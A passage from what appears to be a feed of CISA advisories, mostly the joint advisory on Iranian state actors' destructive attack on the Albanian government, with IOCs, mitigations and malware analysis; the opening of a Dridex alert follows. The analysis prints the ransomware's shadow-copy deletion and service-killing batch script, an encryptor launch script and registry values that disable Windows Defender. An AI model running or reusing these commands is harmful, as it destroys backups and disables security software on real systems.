RDP (primarily), SMB, and FTP for lateral movement throughout the victim environment.\n\n#### Exchange Server compromise\n\nTimeframe: Approximately 1-6 months after initial compromise.\n\nDetails: The actors used a compromised Microsoft Exchange account to run searches (via CmdLets New-MailboxSearch and Get-Recipient) on various mailboxes, including for administrator accounts. 
In this timeframe, the actors used the compromised account to create a new Exchange account and add it to the Organization Management role group.\n\n#### Likely Email exfiltration\n\nTimeframe: Approximately 8 months after initial compromise.\n\nDetails: The actors made thousands of HTTP POST requests to Exchange servers of the victim organization. The FBI observed the client transferring roughly 70-160 MB of data, and the server transferring roughly 3-20 GB of data.\n\n#### VPN activity\n\nTimeframe: Approximately 12-14 months after initial compromise.\n\nDetails: Approximately twelve months after initial access and two months before launching the destructive cyber attack, the actors made connections to IP addresses belonging to the victim organization\u2019s Virtual Private Network (VPN) appliance. The actors\u2019 activity primarily involved two compromised accounts. The actors executed the \u201cAdvanced Port Scanner\u201d (advanced_port_scanner.exe). The FBI also found evidence of Mimikatz usage and LSASS dumping.\n\n#### File Cryptor (ransomware-style file encryptor)\n\nTimeframe: Approximately 14 months after initial compromise.\n\nDetails: For the encryption component of the cyber attack, the actor logged in to a victim organization print server via RDP and kicked off a process (Mellona.exe) which would propagate the GoXml.exe encryptor to a list of internal machines, along with a persistence script called win.bat. As deployed, GoXML.exe encrypted all files (except those having extensions .exe, .dll, .sys, .lnk, or .lck) on the target system, leaving behind a ransom note titled How_To_Unlock_MyFiles.txt in each folder impacted.\n\n#### Wiper attack\n\nTimeframe: Approximately 14 months after initial compromise.\n\nDetails: In the same timeframe as the encryption attack, the actors began actions that resulted in raw disk drives being wiped with the Disk Wiper tool (cl.exe) described in Appendix A. 
Over approximately the next eight hours, numerous RDP connections were logged from an identified victim server to other hosts on the victim\u2019s network. Command line execution of cl.exe was observed in cached bitmap files from these RDP sessions on the victim server.\n\n### Mitigations\n\nFBI and CISA recommend organizations apply the following best practices to reduce risk of compromise: \n\n * **Ensure anti-virus and anti-malware software is enabled and signature definitions are updated** regularly and in a timely manner. Well-maintained anti-virus software may prevent use of commonly deployed cyber attacker tools that are delivered via spear-phishing.\n * **Adopt threat reputation services at the network device, operating system, application, and email service levels**. Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spear-phishing attacks.\n * If your organization is employing certain types of software and appliances vulnerable to known Common Vulnerabilities and Exposures (CVEs), **ensure those vulnerabilities are patched**. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n * **Monitor for unusually large amounts of data** (i.e., several GB) being transferred from a Microsoft Exchange server.\n * **Check the host-based indications**, including webshells, for positive hits within your environment.\n * Maintain and test an incident response plan.\n * Ensure your organization has a vulnerability management program in place and that it prioritizes patch management and vulnerability scanning of [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). 
Note: CISA\u2019s [Cyber Hygiene Services](<https://www.cisa.gov/cyber-hygiene-services>) (CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector critical infrastructure organizations.\n * Properly configure and secure internet-facing network devices. \n * Do not expose management interfaces to the internet.\n * Disable unused or unnecessary network ports and protocols.\n * Disable/remove unused network services and devices.\n * Adopt [zero-trust principles and architecture](<https://www.cisa.gov/blog/2021/09/07/no-trust-no-problem-maturing-towards-zero-trust-architectures>), including: \n * Micro-segmenting networks and functions to limit or block lateral movements.\n * Enforcing phishing-resistant multifactor authentication (MFA) for all users and VPN connections.\n * Restricting access to trusted devices and users on the networks.\n\nFor more information on Iranian government-sponsored malicious cyber activity, see CISA's webpage \u2013 [Iran Cyber Threat Overview and Advisories](<https://www.us-cert.cisa.gov/iran>).\n\n### **Appendix A**\n\n**Host-based IOCs**\n\n_Additional details concerning some of these files are provided in Appendix B._\n\nFile\n\n| \n\nMD5 Hash\n\n| \n\nNotes \n \n---|---|--- \n \nError4.aspx\n\n| \n\n81e123351eb80e605ad73268a5653ff3\n\n| \n\nWebshell \n \ncl.exe\n\n| \n\n7b71764236f244ae971742ee1bc6b098\n\n| \n\nWiper \n \nGoXML.exe\n\n| \n\nbbe983dba3bf319621b447618548b740\n\n| \n\nEncryptor \n \nGoxml.jpg\n\n| \n\n0738242a521bdfe1f3ecc173f1726aa1\n\n| \n \nClientBin.aspx\n\n| \n\na9fa6cfdba41c57d8094545e9b56db36\n\n| \n\nWebshell (reverse-proxy connections) \n \nPickers.aspx\n\n| \n\n8f766dea3afd410ebcd5df5994a3c571\n\n| \n\nWebshell \n \nevaluatesiteupgrade.cs.aspx\n\n| \n\nUnknown\n\n| \n\nWebshell \n \nmellona.exe\n\n| \n\n78562ba0069d4235f28efd01e3f32a82\n\n| \n\nPropagation for Encryptor \n \nwin.bat\n\n| \n\n1635e1acd72809479e21b0ac5497a79b\n\n| \n\nLaunches 
GoXml.exe on startup \n \nwin.bat\n\n| \n\n18e01dee14167c1cf8a58b6a648ee049\n\n| \n\nChanges desktop background to encryption image \n \nbb.bat\n\n| \n\n59a85e8ec23ef5b5c215cd5c8e5bc2ab\n\n| \n\nSaves SAM and SYSTEM hives to C:\\Temp, makes cab archive \n \ndisable_defender.exe\n\n| \n\n60afb1e62ac61424a542b8c7b4d2cf01\n\n| \n\nDisables Windows Defender \n \nrwdsk.sys\n\n| \n\n8f6e7653807ebb57ecc549cef991d505\n\n| \n\nRaw disk driver utilized by wiper malware \n \nApp_Web_bckwssht.dll\n\n| \n\ne9b6ecbf0783fa9d6981bba76d949c94\n\n| \n \n**Network-based IOCs**\n\nFBI review of Commercial VPN service IP addresses revealed the following resolutions (per Akamai data):\n\nCountry\n\n| \n\nCompany \n \n---|--- \n \nAL\n\n| \n\nKEMINET LTD. \n \nDE\n\n| \n\nNOOP-84-247-59-0-25 \n \nDE\n\n| \n\nGSL NETWORKS \n \nGB\n\n| \n\nLON-CLIENTS \n \nGB\n\n| \n\nGB-DATACENTER \n \nNL\n\n| \n\nNL-LAYERSWITCH-20190220 \n \nNL\n\n| \n\nPANQ-45-86-200-0 \n \nUS\n\n| \n\nPRIVATE CUSTOMER \n \nUS\n\n| \n\nBANDITO NETWORKS \n \nUS\n\n| \n\nEXTERNAL \n \nUS\n\n| \n\nRU-SELENA-20080725 \n \nUS\n\n| \n\nTRANS OCEAN NETWORK \n \n## Appendix B\n\n### _Ransomware Cryptor_\n\n`GoXML.exe` is a ransomware style file encryptor. It is a Windows executable, digitally signed with a certificate issued to the Kuwait Telecommunications Company KSC, a subsidiary of Saudi Telecommunications Company (STC).\n\nIf executed with five or more arguments (the arguments can be anything, as long as there are five or more), the program silently engages its file encryption functionality. Otherwise, a file-open dialog Window is presented, and any opened documents receive an error prompt labeled, `Xml Form Builder.`\n\nAll internal strings are encrypted with a hard coded RC4 key. Before internal data is decrypted, the string decryption routine has a built-in self-test that decrypts a DWORD value and tests to see if the plaintext is the string `yes`. 
If so, it will continue to decode its internal strings.\n\nThe ransomware will attempt to launch the following batch script; however, this will fail due to a syntax error.\n\n@for /F \"skip=1\" %C in ('wmic LogicalDisk get DeviceID') do (@wmic /namespace:\\\\\\root\\default Path SystemRestore Call disable \"%C\\\" & @rd /s /q %C\\$Recycle.bin)\n\n@vssadmin.exe delete shadows /all /quiet\n\n@set SrvLst=vss sql svc$ memtas mepos sophos veeam backup GxVss GxBlr GxFWD GxCVD GxCIMgr DefWatch ccEvtMgr ccSetMgr SavRoam RTVscan QBFCService QBIDPService ntuit.QuickBooks.FCS QBCFMonitorService YooBackup YooIT zhudongfangyu sophos stc_raw_agent VSNAPVSS VeeamTransportSvc VeeamDeploymentService VeeamNFSSvc veeam PDVFSService BackupExecVSSProvider BackupExecAgentAccelerator BackupExecAgentBrowser BackupExecDiveciMediaService BackupExecJobEngine BackupExecManagementService BackupExecRPCService AcrSch2Svc AcronisAgent CASAD2DWebSvc CAARCUpdateSvc\n\n@for %C in (%SrvLst%) do @net stop %C\n\n@set SrvLst=\n\n@set PrcLst=mysql sql oracle ocssd dbsnmp synctime agntsvc isqlplussvc xfssvccon mydesktopservice ocautoupds encsvc tbirdconfig mydesktopqos ocomm dbeng50 sqbcoreservice excel infopath msaccess mspub onenote outlook powerpnt steam thebat thunderbird visio winword wordpad notepad\n\n@for %C in (%PrcLst%) do @taskkill /f /im \"%C.exe\"\n\n@set PrcLst=\n\n@exit \n \n--- \n \nThe syntax error consists of a missing backslash that separates `system32` and `cmd.exe`, so the process is launched as `system32cmd.exe` which is an invalid command.\n\n\n\nScript Launch Bug\n\nThe ransomware\u2019s file encryption routine will generate a random string, take the MD5 hash and use that to generate an RC4 128 key which is used to encrypt files. This key is encrypted with a hard coded Public RSA key and converted to Base64 utilizing a custom alphabet. 
This is appended to the end of the ransom note.\n\nThe cryptor places a file called `How_To_Unlock_MyFiles.txt` in directories with encrypted files.\n\nEach encrypted file is given the `.lck` extension and the contents of each file are only encrypted up to `0x100000` or 1,048,576 bytes which is a hard coded limit.\n\nSeparately, the actor ran a batch script (win.bat below) to set a specific desktop background.\n\n### File Details\n\nGoXml.exe \n \n--- \n \nFile Size:\n\n| \n\n43.48 KB (44520 bytes) \n \nSHA256:\n\n| \n\nf116acc6508843f59e59fb5a8d643370dce82f492a217764521f46a856cc4cb5 \n \nSHA1:\n\n| \n\n5d117d8ef075f3f8ed1d4edcc0771a2a0886a376 \n \nMD5:\n\n| \n\nbbe983dba3bf319621b447618548b740 \n \nSSDeep:\n\n| \n\n768:+OFu8Q3w6QzfR5Jni6SQD7qSFDs6P93/q0XIc/UB5EPABWX\n\n:RFu8QAFzffJui79f13/AnB5EPAkX (Ver 1.1) \n \nFile Type:\n\n| \n\nPE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows \n \nPE Header Timestamp:\n\n| \n\n2016-04-30 17:08:19 \n \nImpHash:\n\n| \n\n5b2ce9270beea5915ec9adbcd0dbb070 \n \nCert #0 Subject C=KW, L=Salmiya, O=Kuwait Telecommunications Company KSC, OU=Kuwait Telecommunications Company, CN=Kuwait Telecommunications Company KSC\n\nCert #0 Issuer C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Assured ID Code Signing CA\n\nCert #0 SHA1 55d90ec44b97b64b6dd4e3aee4d1585d6b14b26f \n \nwin.bat (#1, run malware) \n \n--- \n \nFile Size:\n\n| \n\n67 bytes \n \nSHA256:\n\n| \n\nbad65769c0b416bb16a82b5be11f1d4788239f8b2ba77ae57948b53a69e230a6 \n \nSHA1:\n\n| \n\n14b8c155e01f25e749a9726958606b242c8624b9 \n \nMD5:\n\n| \n\n1635e1acd72809479e21b0ac5497a79b \n \nSSDeep:\n\n| \n\n3:LjTFKCkRErG+fyM1KDCFUF82G:r0aH1+DF82G (Ver 1.1) \n \nFile Type:\n\n| \n\nASCII text, with no line terminators \n \nContents: \n\n| \n\nstart /min C:\\ProgramData\\Microsoft\\Windows\\GoXml.exe 1 2 3 4 5 6 7 \n \nwin.bat (#2, install desktop image) \n \n--- \n \nFilename:\n\n| \n\nec4cd040fd14bff86f6f6e7ba357e5bcf150c455532800edf97782836e97f6d2 
\n \nFile Size:\n\n| \n\n765 bytes \n \nSHA256:\n\n| \n\nec4cd040fd14bff86f6f6e7ba357e5bcf150c455532800edf97782836e97f6d2 \n \nSHA1:\n\n| \n\nfce0db6e66d227d3b82d4564446ede0c0fd7598c \n \nMD5:\n\n| \n\n18e01dee14167c1cf8a58b6a648ee049 \n \nSSDeep:\n\n| \n\n12:wbYVJ69/TsdLd6sdLd3mTDwfV+EVTCuwfV+EVTCuwfV+EVTCuwfV+EVTCuwfV\n\n+Et:wq69/kZxZ3mTDY9HY9HY9HY9HY9j (Ver 1.1) \n \nFile Type:\n\n| \n\nDOS batch file text, ASCII text, with CRLF line terminators \n \nContents:\n\n@echo off\n\nsetlocal enabledelayedexpansion\n\nset \"Wtime=!time:~0,2!\"\n\nif \"!Wtime!\" leq \"20\" reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"c:\\programdata\\GoXml.jpg\" /f & goto done\n\nif \"!Wtime!\" geq \"20\" reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"c:\\programdata\\GoXml.jpg\" /f & goto done\n\n:done\n\ntimeout /t 5 >nul\n\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\n\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\n\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\n\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\n\nstart \"\" /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True\n\nendlocal \n \ngoxml.jpg \n \n--- \n \nFile Size:\n\n| \n\n1.2 MB (1259040 bytes) \n \nSHA256:\n\n| \n\n63dd02c371e84323c4fd9a161a75e0f525423219e8a6ec1b95dd9eda182af2c9 \n \nSHA1:\n\n| \n\n683eaec2b3bb5436f00b2172e287dc95e2ff2266 \n \nMD5:\n\n| \n\n0738242a521bdfe1f3ecc173f1726aa1 \n \nSSDeep:\n\n| \n\n12288:ME0p1RE70zxntT/ylTyaaSMn2fS+0M6puxKfJbDKrCxMe5fPSC2tmx\n\nVjpJT/n37p:MHyUt7yQaaPXS6pjar+MwrjpJ7VIbZg (Ver 1.1) \n \nFile Type:\n\n| \n\nJPEG image data, Exif standard: [TIFF image data, big-endian, direntries=13, height=1752, bps=0, PhotometricIntepretation=CMYK, orientation=upper-left, width=2484TIFF image data, big-endian, direntries=13, height=1752, bps=0, PhotometricIntepretation=CMYK, 
orientation=upper-left, width=2484], progressive, precision 8, 2484x1752, components 4 \n \nSoftware:\n\n| \n\nAdobe Photoshop 22.4 (Windows) \n \nModify Date:\n\n| \n\n2022-07-13 20:45:20 \n \nCreate Date:\n\n| \n\n2020-06-11 02:13:33 \n \nMetadata Date:\n\n| \n\n2022-07-13 20:45:20 \n \nProfile Date Time:\n\n| \n\n2000-07-26 05:41:53 \n \nImage Size:\n\n| \n\n2484x1752 \n \nFile Size:\n\n| \n\n1.2 MB (1259040 bytes) \n \nSHA256:\n\n| \n\n63dd02c371e84323c4fd9a161a75e0f525423219e8a6ec1b95dd9eda182af2c9 \n \n### _Disk Wiper_\n\nThe files `cl.exe` and `rwdsk.sys` are part of a disk wiper utility that provides raw access to the hard drive for the purposes of wiping data. From the command line the cl.exe file accepts the arguments:\n\n * `in`\n * `un`\n * `wp <optional argument>`\n\nIf executed with the `in` command, the utility will output `in start!` and installs a hard coded file named rwdsk.sys as a service named `RawDisk3`. The `.SYS` file is not extracted from the installer however, but rather the installer looks for the file in the same directory that the `cl.exe` is executed in. \n\n\n\n\n\n_It will also load the driver after installation_.\n\n\n\nThe `un` command uninstalls the service, outputting the message `\u201cun start!\u201d` to the terminal. \nThe `wp` command will access the loaded driver for raw disk access.\n\n\n\nRaw Disk Access\n\nThe long hexadecimal string is hard coded in the` cl.exe` binary.\n\nRawDisk3File = (void *)toOpenRawDisk3File(\n\narg2_WideCharStr,\n\n0xC0000000,\n\nL\"B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D\");\n\nptrRawDiskFile = RawDisk3File;\n\nif ( RawDisk3File )\n\n{\n\nsizeDisk = toGetDiskSize(RawDisk3File);\n\nterminal_out(\"Total Bytez : %lld\\n\", sizeDisk << 9); \n \n--- \n \nThe `wp` command also takes an additional argument as a device path to place after` \\RawDisk3\\` in the output string. 
It is uncertain what creates this path to a device as the driver tested did not.\n\nThe output is \u201cwp starts!\u201d followed by the total bytes of the drive and the time the wipe operation takes.\n\nIf the registry key value HKLM\\SOFTWARE\\EldoS\\EventLog is set to \u201cEnabled\u201d, the install will generate an event log if at any time the install produces an error. This log contains an error code DWORD followed by the string ..\\\\..\\DriverLibraries\\DrvSupLib\\install.c. If the system does not have the SOFTWARE\\EldoS key, no event logs would be produced. This feature must be a related to the legitimate EldoS utility. \n\n\n\nrwdsk.sys is a \u201clegitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer\u2019s hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.\"https://attack.mitre.org/software/S0364/\n\n#### File Details\n\ncl.exe\n\n| \n \n---|--- \n \nFile Size\n\n| \n\n142.5 KB (145920 bytes) \n \nSHA256\n\n| \n\ne1204ebbd8f15dbf5f2e41dddc5337e3182fc4daf75b05acc948b8b965480ca0 \n \nSHA1\n\n| \n\nf22a7ec80fbfdc4d8ed796119c76bfac01e0a908 \n \nMD5\n\n| \n\n7b71764236f244ae971742ee1bc6b098 \n \nSSDeep\n\n| \n\n3072:vv2ADi7yOcE/YMBSZ0fZX4kpK1OhJrDwM:vv2jeQ/flfZbKM (Ver 1.1) \n \nFiletype\n\n| \n\nPE32+ executable (console) x86-64, for MS Windows \n \nPE Header Timestamp\n\n| \n\n2022-07-15 13:26:28 \n \nImpHash\n\n| \n\n58d51c1152817ca3dec77f2eee52cbef \n \nrwdsk.sys\n\n| \n---|--- \n \nFile Size\n\n| \n\n38.84 KB (39776 bytes) \n \nSHA256\n\n| \n\n3c9dc8ada56adf9cebfc501a2d3946680dcb0534a137e2e27a7fcb5994cd9de6 \n \nSHA1\n\n| \n\n5e061701b14faf9adec9dd0b2423ff3cfc18764b \n \nMD5\n\n| \n\n8f6e7653807ebb57ecc549cef991d505 \n \nSSDeep\n\n| \n\n768:E31ySCpoCbXnfDbEaJSooKIDyE9aBazWlEAusxsia:0gyCb3MFKIHO4Ausxta (Ver 1.1) \n 
\nFiletype\n\n| \n\nPE32+ executable (native) x86-64, for MS Windows \n \nPEtype\n\n| \n\nDriver \n \nPE Header Timestamp\n\n| \n\n2016-03-18 14:44:54 \n \nImpHash\n\n| \n\ne233f2cdc91faafe1467d9e52f166213 \n \nCert #0 Subject\n\n| \n\nCN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US \n \nCert #0 Issuer\n\n| \n\nCN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US \n \nCert #0 SHA1\n\n| \n\n382c18388fb326221dfd7a77ee874f9ba60e04bf \n \nCert #1 Subject\n\n| \n\nC=US, ST=California, L=SANTA CLARA, O=NVIDIA Corporation, CN=NVIDIA Corporation \n \nCert #1 Issuer\n\n| \n\nC=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA \n \nCert #1 SHA1\n\n| \n\n30632ea310114105969d0bda28fdce267104754f \n \nCert #2 Subject\n\n| \n\nC=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. - For authorized use only, CN=VeriSign Class 3 Public Primary Certification Authority - G5 \n \nCert #2 Issuer\n\n| \n\nC=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Code Verification Root \n \nCert #2 SHA1\n\n| \n\n57534ccc33914c41f70e2cbb2103a1db18817d8b \n \nCert #3 Subject\n\n| \n\nC=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA \n \nCert #3 Issuer\n\n| \n\nC=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. - For authorized use only, CN=VeriSign Class 3 Public Primary Certification Authority - G5 \n \nCert #3 SHA1\n\n| \n\n495847a93187cfb8c71f840cb7b41497ad95c64f \n \n### Additional Files\n\n#### _Web Deployed Reverse Proxy_\n\n#### Description\n\nClientBin.aspx is an ASP file that contains a Base64 encoded .Net executable (App_Web_bckwssht.dll) that it decodes and loads via Reflection. 
The .Net executable contains Class and Method obfuscation and internal strings are encoded with a single byte XOR obfuscation.\n\npublic static string hair_school_bracket() \n{ \nreturn Umbrella_admit_arctic.rebel_sadreporthospital(\"460F2830272A2F2266052928202F21661627252D27212368\"); //Invalid Config Package. \n}\n\npublic static string Visual_math_already() \n{ \nreturn Umbrella_admit_arctic.rebel_sadreporthospital(\"5304057E0116001607\"); //WV-RESET\n\nThe method rebel_sadreporthospital takes the first byte of the encoded string and XOR\u2019s each subsequent byte to produce the de-obfuscated string.\n\nWhen run in context of an IIS web server connecting to the ASPX file will generate a 200 <Encryption DLL Info> 1.5 output. \n\n\n\n\n_Initial connection_\n\nThe hex string represents the following ASCII text:\n\nBase64, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\n\nSending a POST request with a Base64 encoded IP and port will open a second socket to the supplied IP and port making this a Web proxy. \n\n\n\n_Second Socket Opened from POST Request_\n\nSending a request to WV-RESET with a value will produce an OK response and call a function to shut down the proxy socket.\n\n\n\n_Terminate socket_\n\nThe DLL extracts a secondary \u201cEncryptionDLL\u201d named Base64.dll which is loaded via Assembly.Load. This exposes two functions, encrypt and decrypt. This DLL is used to decrypt the Proxy IP and port along with data. In this instance the class name is misspelled Bsae64, which is also reflected in the calling DLLs decoded strings. It is uncertain as to why an additional Base64.dll binary is extracted when the same encoding could be hard coded in the original DLL. It is possible other versions of this tool utilize differing \u201cEncryptionDLL\u201d binaries. 
\n\n\n\n\n_Misspelled Class Name_\n\n\n\n_Called Misspelled Nam_e\n\n_**File Details**_\n\nClientBin.aspx\n\n| \n---|--- \n \nFile Size\n\n| \n\n55.24 KB (56561 bytes) \n \nSHA256\n\n| \n\n7ad64b64e0a4e510be42ba631868bbda8779139dc0daad9395ab048306cc83c5 \n \nSHA1\n\n| \n\ne03edd9114e7a0138d1309034cad6b461ab0035b \n \nMD5\n\n| \n\na9fa6cfdba41c57d8094545e9b56db36 \n \nSSDeep\n\n| \n\n768:x9TfK6nOgo5zE/cezUijAwZIFxK1mGjncrF8EAZ0iBDZBZdywb0DwHN4N4wjMxr8:x9TfdOgAi2 (Ver 1.1) \n \nFiletype\n\n| \n\nHTML document text, ASCII text, with very long lines (56458) \n \nApp_Web_bckwssht.dll\n\n| \n---|--- \n \nFile Size\n\n| \n\n41.0 KB (41984 bytes) \n \nSHA256\n\n| \n\ncad2bc224108142b5aa19d787c19df236b0d12c779273d05f9b0298a63dc1fe5 \n \nSHA1\n\n| \n\n49fd8de33aa0ea0c7432d62f1ddca832fab25325 \n \nMD5\n\n| \n\ne9b6ecbf0783fa9d6981bba76d949c94 \n \nSSDeep\n\n| \n\n384:coY4jnD7l9VAk1dtrGBlLGYEX1tah8dgNyamGOvMTfdYN5qZAsP:hlXAkHRGBlUUh8cFmpv6feYLP (Ver 1.1) \n \nFiletype\n\n| \n\nPE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows \n \nPEtype\n\n| \n\nDLL \n \nPE Header Timestamp\n\n| \n\n2021-06-07 10:37:55 \n \nImpHash\n\n| \n\ndae02f32a21e03ce65412f6e56942daa \n \n#### _Disable Defender_\n\n_Description_\n\ndisable_defender.exe is a Microsoft Windows PE file that attempts to disable Windows Defender. The application will elevate privileges to that of SYSTEM and then attempt to disable Defender\u2019s core functions. A command prompt with _status_ and _error_ messages is displayed as the application executes. No network activity was detected during the evaluation.\n\nUpon execution, a command prompt is launched and a message is displayed if the process is not running as SYSTEM. 
The process is then restarted with the required permissions.\n\n\n\n_Test validate permissions_\n\nThe application will attempt to terminate the Windows Defender process by calling _TerminateProcess_ for smartscreen.exe:\n\n\n\n_Attempt to kill Windows Defender_\n\nThe following Registry Keys were modified to disable Windows Defender:\n\nSet Registry Values (observed Win10 1709)\n\n| \n \n---|--- \n \nHKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features\\TamperProtection \n\n| \n\n0 \n \n| \n \nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware \n\n| \n\n1 \n \nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ \nStartupApproved\\Run\\SecurityHealth \n\n| \n\n03 00 00 00 5D 02 00 00 41 3B 47 9D \n \nHKLM\\SOFTWARE\\Microsoft\\Windows Defender\\DisableAntiSpyware \n\n| \n\n1 \n \nHKLM\\System\\CurrentControlSet\\Services\\WinDefend\\Start \n\n| \n\n3 \n \nHKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\ \nDisableRealtimeMonitoring \n\n| \n\n1 \n \nUpon completion and if successful the application will display the following messages and wait for user input.\n\n\n\n_User Input_ \n\n\ndisable-defender.exe\n\n| \n---|--- \n \nFile Size\n\n| \n\n292.0 KB (299008 bytes) \n \nSHA256\n\n| \n\n45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace \n \nSHA1\n\n| \n\ne866cc6b1507f21f688ecc2ef15a64e413743da7 \n \nMD5\n\n| \n\n60afb1e62ac61424a542b8c7b4d2cf01 \n \nSSDeep\n\n| \n\n6144:t2WhikbJZc+Wrbe/t1zT/p03BuGJ1oh7ISCLun:t2WpZnW+/tVoJ1ouQ (Ver 1.1) \n \nFiletype\n\n| \n\nPE32+ executable (console) x86-64, for MS Windows \n \nPEtype\n\n| \n\nEXE \n \nPE Header Timestamp\n\n| \n\n2021-10-24 15:07:32 \n \nImpHash\n\n| \n\n74a6ef9e7b49c71341e439022f643c8e \n \n### Revisions\n\nSeptember 21, 2022: Initial Version|September 22, 2022: Reordered items in the Mitigation Section|September 23, 2022: Add the STIX file\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": 
"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-23T12:00:00", "type": "ics", "title": "Iranian State Actors Conduct Cyber Operations Against the Government of Albania", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2022-09-23T12:00:00", "id": "AA22-264A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-264a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:53:15", "description": "### Summary\n\nThis Alert is the result of recent collaboration between the Department of the Treasury Financial Sector Cyber Information Group (CIG) and the Department of the Treasury\u2019s Financial Crimes Enforcement Network (FinCEN) to identify and share information with the financial services sector. Treasury and the Cybersecurity and Infrastructure Security Agency (CISA) are providing this report to inform the sector about the Dridex malware and variants. The report provides an overview of the malware, related activity, and a list of previously unreported indicators of compromise derived from information reported to FinCEN by private sector financial institutions. 
Because actors using Dridex malware and its derivatives continue to target the financial services sector, including financial institutions and customers, the techniques, tactics, and procedures contained in this report warrant renewed attention. Treasury and CISA encourage network security specialists to incorporate these indicators into existing Dridex-related network defense capabilities and planning. For information regarding the malicious cyber actors responsible for the development and distribution of the Dridex malware, see the Treasury press release, [Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware](<https://home.treasury.gov/news/press-releases/sm845>) and the FBI press release, [Russian National Charged with Decade-Long Series of Hacking and Bank Fraud Offenses Resulting in Tens of Millions in Losses and Second Russian National Charged with Involvement in Deployment of \u201cBugat\u201d Malware](<https://www.justice.gov/opa/pr/russian-national-charged-decade-long-series-hacking-and-bank-fraud-offenses-resulting-tens?hootPostID=629d449ac4fd1b12d37f66d6551dbec1>).\n\n_This Alert does not introduce a new regulatory interpretation, nor impose any new requirements on regulated entities. Except where noted, there is no indication that the actual owner of the email address was involved in the suspicious or malicious activity. If activity related to these indicators of compromise is detected, please notify appropriate law enforcement and the CIG._\n\nFor a downloadable copy of IOCs, see:\n\n * [AA19-339A_WHITE.csv](<https://www.us-cert.gov/sites/default/files/publications/AA19-339A_WHITE.csv>)\n * [AA19-339A_WHITE.stix](<https://www.us-cert.gov/sites/default/files/publications/AA19-339A_WHITE_stix.xml>)\n\n### Technical Details\n\nThe Dridex malware, and its various iterations, has the capability to impact confidentiality of customer data and availability of data and systems for business processes. 
According to industry reporting, the original version of Dridex first appeared in 2012, and by 2015 had become one of the most prevalent financial Trojans. We expect actors using Dridex malware and its derivatives to continue targeting the financial services sector, including both financial institutions and customers.\n\n## Dridex-related Phishing Attributes\n\nActors typically distribute Dridex malware through phishing e-mail spam campaigns. Phishing messages employ a combination of legitimate business names and domains, professional terminology, and language implying urgency to persuade victims to open or activate attachments. Sender e-mail addresses can simulate individuals (name@domain.com), administrative accounts (admin@domain.com, support@domain.com), or common \u201cdo not reply\u201d local parts (noreply@domain.com). Subject and attachment titles can include typical terms such as \u201cinvoice\u201d, \u201corder\u201d, \u201cscan\u201d, \u201creceipt\u201d, \u201cdebit note\u201d, \u201citinerary\u201d, and others.\n\nThe e-mail messages vary widely. The e-mail body may contain no text at all, except to include attachments with names that are strings of numbers, apparently relying on the subject line and victim curiosity to coerce the opening of the malicious file. Where there is a message body, the body may specifically state that the contents of the 